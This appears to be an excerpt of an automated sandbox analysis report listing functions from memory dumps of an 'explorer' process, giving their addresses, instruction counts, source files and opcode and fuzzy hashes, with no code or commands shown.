                                                                                        • String ID: HfH
                                                                                        • API String ID: 0-768170587
                                                                                        • Opcode ID: 232156e6cd9f618fe07f828539c7476745361ddd59c4e479b8ff3a1a4515389d
                                                                                        • Instruction ID: 4fae8dde2c5212cc58341564f8dff7ac37a127900307531767b79bb3f0096c59
                                                                                        • Opcode Fuzzy Hash: 232156e6cd9f618fe07f828539c7476745361ddd59c4e479b8ff3a1a4515389d
                                                                                        • Instruction Fuzzy Hash: 42612731B0DA994FE75AEB2888556753BE1FF55750F0800BFD48ADB2E3CA296C06C345
                                                                                        Function 00007FF848F4B1B7 Relevance: 1.4, Strings: 1, Instructions: 192COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F48000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F48000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f48000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: `MH
                                                                                        • API String ID: 0-1881654037
                                                                                        • Opcode ID: 4bb6f416b4c2bf149417816bd51f0e7132c3ff440081d0c61bf547ecb0009605
                                                                                        • Instruction ID: c9333e5c0312da090996814fe869e3ff002247bbb4724afd0a0a8d04874cbec8
                                                                                        • Opcode Fuzzy Hash: 4bb6f416b4c2bf149417816bd51f0e7132c3ff440081d0c61bf547ecb0009605
                                                                                        • Instruction Fuzzy Hash: D0512631B1C9084FEB89EB6898556BD7BE2EFD8710F18417AD00DE72D6DF2898058750
                                                                                        Function 00007FF848F407ED Relevance: 1.3, Strings: 1, Instructions: 2COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f40000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: <L_^
                                                                                        • API String ID: 0-1405735369
                                                                                        • Opcode ID: 215bf2dbfbaa4c9c39bf0e48662747119e111db7de401eff924b08441cbfb910
                                                                                        • Instruction ID: 53d177848156a6f52027fdebb80b6f4c9dda6d75cf267d6cebe00bc6fddda260
                                                                                        • Opcode Fuzzy Hash: 215bf2dbfbaa4c9c39bf0e48662747119e111db7de401eff924b08441cbfb910
                                                                                        • Instruction Fuzzy Hash:
                                                                                        Function 00007FF848F56799 Relevance: .5, Instructions: 479COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F56000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F56000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f56000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8d03e3447ae0f28961cb5ba09c869d8eb76c7e73560c67d1afddd377bdff07e7
                                                                                        • Instruction ID: 6efaf78ea82e743d7f22a4357d4e0c27cb66ec12b515eb699f6e83331d13c529
                                                                                        • Opcode Fuzzy Hash: 8d03e3447ae0f28961cb5ba09c869d8eb76c7e73560c67d1afddd377bdff07e7
                                                                                        • Instruction Fuzzy Hash: D4F1173090EB854FE356AB3488A5165BBA1EF56381F1800FEC099CB2E3DF2DAC46C755
                                                                                        Function 00007FF848F4BE45 Relevance: .3, Instructions: 330COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F48000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F48000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f48000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 97900bb71dfd0871bd4aab6bd8d3af54fa3e4836da814868a25bbe459613bb69
                                                                                        • Instruction ID: d2c65454ee529ce8aef0e28ff0b072b3359d1521aec0914fdfd435ecb8b2583f
                                                                                        • Opcode Fuzzy Hash: 97900bb71dfd0871bd4aab6bd8d3af54fa3e4836da814868a25bbe459613bb69
                                                                                        • Instruction Fuzzy Hash: 75A19031B1C94A4FE794EB6C989867877D1FFA8A90B0502B7D04DD72E7EE28AC418744
                                                                                        Function 00007FF848F564C8 Relevance: .2, Instructions: 228COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F56000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F56000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f56000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6afbf5911c1c717f0848d98237e29816357b03786eb19272b647a39704d027c8
                                                                                        • Instruction ID: 60b7b1d62f817bb35263e06e9498201abe914ece74fa31410fefd96cbd5a1ae4
                                                                                        • Opcode Fuzzy Hash: 6afbf5911c1c717f0848d98237e29816357b03786eb19272b647a39704d027c8
                                                                                        • Instruction Fuzzy Hash: B661F83071DA454FD759EB2C98A86647BE2EF59380B4500FEE049CB2E7DE29EC41C745
                                                                                        Function 00007FF848F4AFF8 Relevance: .2, Instructions: 186COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F48000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F48000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f48000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cfccf64f6c271f6760b8949180fd48e2863081f8b14363ac786c68959015e463
                                                                                        • Instruction ID: f5c3220790ec6322d8896e2eec3a95036396afd8db8742c398149cd8a90b2fa0
                                                                                        • Opcode Fuzzy Hash: cfccf64f6c271f6760b8949180fd48e2863081f8b14363ac786c68959015e463
                                                                                        • Instruction Fuzzy Hash: C6417B32F1DA460FE394B7AD6C851E67791EFA46A4B48427BD04CD72C3EE1D6C528388
                                                                                        Function 00007FF848F50F06 Relevance: .2, Instructions: 176COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F4F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f4f000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 29dbc1d53fd499124222e7a6715823f6f9fb899a783d4402187cd8a8f1f33ba0
                                                                                        • Instruction ID: a1d95119c3fa8ff1ee959c165ded357621232ebec277a51fd4acb02a9471f2de
                                                                                        • Opcode Fuzzy Hash: 29dbc1d53fd499124222e7a6715823f6f9fb899a783d4402187cd8a8f1f33ba0
                                                                                        • Instruction Fuzzy Hash: A351553190E6C61FE357A7349C566A17FA0EF43264F0901FAD489CB1E3EA4D684BC366
                                                                                        Function 00007FF848F56535 Relevance: .2, Instructions: 155COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F56000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F56000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f56000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 83835750af8396a7dd60dbc65632e1f88f8bd0633356b93985a7c8e34c791e95
                                                                                        • Instruction ID: ac776b26572b38c046f531a096975d3e34e51119e4e4b97505db1f422fd09b0a
                                                                                        • Opcode Fuzzy Hash: 83835750af8396a7dd60dbc65632e1f88f8bd0633356b93985a7c8e34c791e95
                                                                                        • Instruction Fuzzy Hash: 1441D63071DA094FD798BB2D989866877D2FF69380B5400BEE409C72E7DE2AEC41C745
                                                                                        Function 00007FF848FF0245 Relevance: .1, Instructions: 147COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2290375457.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848ff0000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3acf2c8d16f9f835330eb37ed7df7cc8309a9c8284726a3f5bf408eca5deb980
                                                                                        • Instruction ID: 65e3ab9f1be31f391c7a5103c19bb96317009b473ce0a211211ac19ece021a8a
                                                                                        • Opcode Fuzzy Hash: 3acf2c8d16f9f835330eb37ed7df7cc8309a9c8284726a3f5bf408eca5deb980
                                                                                        • Instruction Fuzzy Hash: 9F311832E0EBC94FE7A6E72C58612607FE1EF96260B0901F7C648C72D7DA199C058365
                                                                                        Function 00007FF848F4C350 Relevance: .1, Instructions: 142COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F48000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F48000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f48000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: dc18b0d92810cc0a0bac9d6e19642697992e19833fa694e9b0004db8ed79958d
                                                                                        • Instruction ID: 0a23158bb11cf754d12a11982f4925d762768c60ae4a8b4786a73fe60d3cdc2a
                                                                                        • Opcode Fuzzy Hash: dc18b0d92810cc0a0bac9d6e19642697992e19833fa694e9b0004db8ed79958d
                                                                                        • Instruction Fuzzy Hash: E741C23190DBC54FD396DB6898A59B17FF1EF5B11070946EBC089CF1A3E629A81AC341
                                                                                        Function 00007FF848F48DC5 Relevance: .1, Instructions: 132COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F48000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F48000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f48000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 638ba068c21f54e655db9d7ef8c43f1a91a6a4ea846677d7dd46d4b029cbe54e
                                                                                        • Instruction ID: d9dc1951f83b364399439288b846b54d65b5cdc4ece622c3f70e17ecbeeab522
                                                                                        • Opcode Fuzzy Hash: 638ba068c21f54e655db9d7ef8c43f1a91a6a4ea846677d7dd46d4b029cbe54e
                                                                                        • Instruction Fuzzy Hash: A2415B31A09A4D8FDB99FF28D4546A937A2FFA9351B4401BAE40DD7292CF35DC42CB40
                                                                                        Function 00007FF848F48832 Relevance: .1, Instructions: 118COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F48000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F48000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f48000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c3e29bf6f4bb8ee1c85e523e3290bc59153aef8cf16248f964ce481fa744f603
                                                                                        • Instruction ID: 4835ff9d1961a9b0466622bc41fb4903574f7fe68563001ca032584935f5cd3d
                                                                                        • Opcode Fuzzy Hash: c3e29bf6f4bb8ee1c85e523e3290bc59153aef8cf16248f964ce481fa744f603
                                                                                        • Instruction Fuzzy Hash: C141D5B1A1CB854FE375EB288845B9977E1FFA4B40F5449BFC04CEB292DA386801C746
                                                                                        Function 00007FF848F48DE0 Relevance: .1, Instructions: 117COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F48000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F48000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f48000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9e8613ed3b71c6bd8cebb19986ad16a969e36d83dd1d58c2607a5e9a895f3515
                                                                                        • Instruction ID: 1704f18731776390574a6064167c51e735832e8a012df96a91ba9f62260035f1
                                                                                        • Opcode Fuzzy Hash: 9e8613ed3b71c6bd8cebb19986ad16a969e36d83dd1d58c2607a5e9a895f3515
                                                                                        • Instruction Fuzzy Hash: E7311631A1890D9FDBD8FB28D454AA973A2FFA8755B50057AE40ED7292CE35E842CB40
                                                                                        Function 00007FF848F5789E Relevance: .1, Instructions: 112COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F56000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F56000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f56000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 31b4a8ab9859eaad323ed8b1aa1e2a042713f493745f4e2651f400aa412f4de7
                                                                                        • Instruction ID: 6b0a629d25fda7e4ac4cce4b98dee44d4aace86fa90963ea53707f2ca5770697
                                                                                        • Opcode Fuzzy Hash: 31b4a8ab9859eaad323ed8b1aa1e2a042713f493745f4e2651f400aa412f4de7
                                                                                        • Instruction Fuzzy Hash: D331F33271C9054FE76CEB3D9465675A6E3EFD8250B5A01BAE00ECB2E3DE28AC05C744
                                                                                        Function 00007FF848F49416 Relevance: .1, Instructions: 108COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F48000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F48000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f48000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b50f5f456355edfbef63bfc7fa27c69edf8e78c39c88bcba996c36e9369e27d5
                                                                                        • Instruction ID: 1dc82fd6cacf57a6d651cca3e413b1597a25eb76bdb96434f3ee5dbf08d669d5
                                                                                        • Opcode Fuzzy Hash: b50f5f456355edfbef63bfc7fa27c69edf8e78c39c88bcba996c36e9369e27d5
                                                                                        • Instruction Fuzzy Hash: 64416674E06618AFDF88DF98E595AACB7F2EF58310F201069E40AE7760DB74AD41CB00
                                                                                        Function 00007FF848F5DCA0 Relevance: .1, Instructions: 104COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f5d000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c3f3cd731631d8b4153ba274addf7a6f96e5ec7b3b2def9fe4d84206f30f9c04
                                                                                        • Instruction ID: d9fb5670a562b24dcf18ddf9230face37da94eba77af008d502dcb5406a2629b
                                                                                        • Opcode Fuzzy Hash: c3f3cd731631d8b4153ba274addf7a6f96e5ec7b3b2def9fe4d84206f30f9c04
                                                                                        • Instruction Fuzzy Hash: C631053090CA488FEB58EF68D84A7F9BBE0EB65321F04416FD049C3293CB75A846CB51
                                                                                        Function 00007FF848F506D8 Relevance: .1, Instructions: 102COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F4F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f4f000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 89a0eef640c13e922ed227398490958a6de1988abe17c62708997cf300b9bb1b
                                                                                        • Instruction ID: 7750b109343d8fc0f1419c1cb28de53c0fe50b1112c2f4cadeecb5b42994bce5
                                                                                        • Opcode Fuzzy Hash: 89a0eef640c13e922ed227398490958a6de1988abe17c62708997cf300b9bb1b
                                                                                        • Instruction Fuzzy Hash: D731D331D0C91A8FEBA8FF148852AA9B3A1EFD5340F1041BDD84E976D2DF396D458A84
                                                                                        Function 00007FF848F506EA Relevance: .1, Instructions: 98COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F4F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f4f000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5ff72f33738028ec0fa626ab35930b8c18df67d5b1eec154513d40e5bef2afe5
                                                                                        • Instruction ID: 7cd1e2bb6788e5ad61bd206f6db5957fa64b6d64435a6c524c0857f2e97c8cb4
                                                                                        • Opcode Fuzzy Hash: 5ff72f33738028ec0fa626ab35930b8c18df67d5b1eec154513d40e5bef2afe5
                                                                                        • Instruction Fuzzy Hash: B331B235D0D51A8FEBA8FF1488526A9B2E1EFD9340F1001BDCC4E972D3DF3969468A84
                                                                                        Function 00007FF848F4C3C5 Relevance: .1, Instructions: 95COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F48000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F48000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f48000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1c10982e6af00fc4233218b65d8c6095ae62083d00785e24f45bce7c39da1657
                                                                                        • Instruction ID: 5b3deeb68cd8cc44519b7f4dbd2d5c78cc98d321fe6e2a255eb1e1478137dccf
                                                                                        • Opcode Fuzzy Hash: 1c10982e6af00fc4233218b65d8c6095ae62083d00785e24f45bce7c39da1657
                                                                                        • Instruction Fuzzy Hash: 48212B32B0CA484FD7D8EA5D94C49B177E2FFA821074542BAC10DDB2F6EA20EC098340
                                                                                        Function 00007FF848F4A559 Relevance: .1, Instructions: 88COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F48000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F48000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f48000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e634d3746dadf0ead05cfac779a99cdf5a129b97ae33d75704ae6561d45c61f4
                                                                                        • Instruction ID: 55224f339ae5d31549fd61d4a35d56c8dcbaab32098057bd3a3edc45b1adfbec
                                                                                        • Opcode Fuzzy Hash: e634d3746dadf0ead05cfac779a99cdf5a129b97ae33d75704ae6561d45c61f4
                                                                                        • Instruction Fuzzy Hash: D921333160D7048FD319AB3988965A577E1FFAA660B10057ED48AC37A2CB2AB846C744
                                                                                        Function 00007FF848F507A8 Relevance: .1, Instructions: 84COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F4F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f4f000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 165aba5ecde8c18ebfceb2064ba277644f5902a5fe0a9efdb7d06b189d409a62
                                                                                        • Instruction ID: d7d301d3b150f8becf5c6f28cc13210403b298bf55ff5a2ba777d8dd89d1b643
                                                                                        • Opcode Fuzzy Hash: 165aba5ecde8c18ebfceb2064ba277644f5902a5fe0a9efdb7d06b189d409a62
                                                                                        • Instruction Fuzzy Hash: 303191309085198FDB98EF14C495AA9B7E1FF99301F1045EED80DD72D2CF75A9458F80
                                                                                        Function 00007FF848F4B0F1 Relevance: .1, Instructions: 84COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F48000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F48000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f48000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d78a38de42a0efdcd5a4a2c527e665b5bf52136fb332203c188a621103684744
                                                                                        • Instruction ID: 4b03613d3f215185694abe8e121d4022d1b13a969b8dedca1b04cc3f4a3eca2f
                                                                                        • Opcode Fuzzy Hash: d78a38de42a0efdcd5a4a2c527e665b5bf52136fb332203c188a621103684744
                                                                                        • Instruction Fuzzy Hash: 09216821B1DBCB0FD39697BD5C80165BFA29FAA580B4C41BBC089CB2C7E9459C1A8316
                                                                                        Function 00007FF848FF019F Relevance: .1, Instructions: 80COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2290375457.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848ff0000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6ef861d71bc77d48bdebd944b2eca2c34168cc2135950ed2f268add5d5b05d92
                                                                                        • Instruction ID: 65dd0370fa4598d39e51bd42e38a918fa3a2f269c59f76c75d49f48abac72ff7
                                                                                        • Opcode Fuzzy Hash: 6ef861d71bc77d48bdebd944b2eca2c34168cc2135950ed2f268add5d5b05d92
                                                                                        • Instruction Fuzzy Hash: F311D332E0DE8A4FE3A5B75C1495175AAE1EFA4250F4801B7DA0CC3296EE199C054295
                                                                                        Function 00007FF848F4B581 Relevance: .1, Instructions: 80COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F48000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F48000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f48000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d8b35d10e60f132d2712b14ef77a1070cc95509bdff678292fa5a36a197c108d
                                                                                        • Instruction ID: f8ae6814ea9377e42be4040460d447aca045776d59e0e369fd1c2c5e9d885ec0
                                                                                        • Opcode Fuzzy Hash: d8b35d10e60f132d2712b14ef77a1070cc95509bdff678292fa5a36a197c108d
                                                                                        • Instruction Fuzzy Hash: 8711D03071DA494FD788EB2CD898664B7E1FF6824174500FBE00ACB2A3DA29EC82C704
                                                                                        Function 00007FF848F5078C Relevance: .1, Instructions: 78COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F4F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f4f000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c0dc20d3cdba516e5caf37fca4dadd44874e399efc2f5500a631a3f1353668cf
                                                                                        • Instruction ID: a86986b35c146215fcc238881ece8238433215528a73145e7f8a2e3d6d8eeea9
                                                                                        • Opcode Fuzzy Hash: c0dc20d3cdba516e5caf37fca4dadd44874e399efc2f5500a631a3f1353668cf
                                                                                        • Instruction Fuzzy Hash: 3621F231D0C51A8FE768EF148852AA9B3E1EFC4345F1002FDCC0A972D2DF3968868A84
                                                                                        Function 00007FF848F4C13E Relevance: .1, Instructions: 71COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F48000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F48000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f48000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 66eed71a1924995e993ca16e08107c2eae69d19741badb131d373f693c0ec011
                                                                                        • Instruction ID: aa7b3897026b3da772e832c9a54538db599bf26c15693620af7bbd420cb8627a
                                                                                        • Opcode Fuzzy Hash: 66eed71a1924995e993ca16e08107c2eae69d19741badb131d373f693c0ec011
                                                                                        • Instruction Fuzzy Hash: 95114F31B0C80A4FE694FB6C944953877D1FFA8A91B1413B7D40ED32E6EE29A8854749
                                                                                        Function 00007FF848F40835 Relevance: .1, Instructions: 61COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f40000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b4b8d28de0ef1117b8fe1e59310e6fa158f0b36e89bcac481bd29783d335f802
                                                                                        • Instruction ID: c1cb571368e0776f2f6d2283904af4cc87525d3173ca14622af8dd3bae86ca23
                                                                                        • Opcode Fuzzy Hash: b4b8d28de0ef1117b8fe1e59310e6fa158f0b36e89bcac481bd29783d335f802
                                                                                        • Instruction Fuzzy Hash: 1511D33280C6C54FE745BB2488A20E97FB0FF96600F4800FAD8899B193EB1828198759
                                                                                        Function 00007FF848F4C515 Relevance: .1, Instructions: 59COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F48000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F48000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f48000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9eaf6058bc248e3d26ecd67cbbaedf72fb451c6416f4d7150b2685aafd962017
                                                                                        • Instruction ID: 450dd6e9b2d32b2f7487d6c93b49bf0afcf4aa0bde34cdd3afaf31638b84cbf7
                                                                                        • Opcode Fuzzy Hash: 9eaf6058bc248e3d26ecd67cbbaedf72fb451c6416f4d7150b2685aafd962017
                                                                                        • Instruction Fuzzy Hash: C101ED32B0D9894FE386E73C54592B83BE1EBB9A10B0401BBC008D76E2DE186C06C381
                                                                                        Function 00007FF848F5DD7C Relevance: .1, Instructions: 53COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2288705177.00007FF848F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_7ff848f5d000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7fb24e2e4921d8010c38cbf9182f60d74c89af98df62389c94f0be4da67971cb
                                                                                        • Instruction ID: 58a77bf4a422faef81fd0281402bb2f38be9adc1d200324898f01a58efd34785
                                                                                        • Opcode Fuzzy Hash: 7fb24e2e4921d8010c38cbf9182f60d74c89af98df62389c94f0be4da67971cb
                                                                                        • Instruction Fuzzy Hash: EF01803150D3C14EE7079B7458522E4BFA0DF53261F1941EBC095CA4E7C66A545ACB72
                                                                                        Function 00007FF848F50796 Relevance: .1, Instructions: 51COMMON
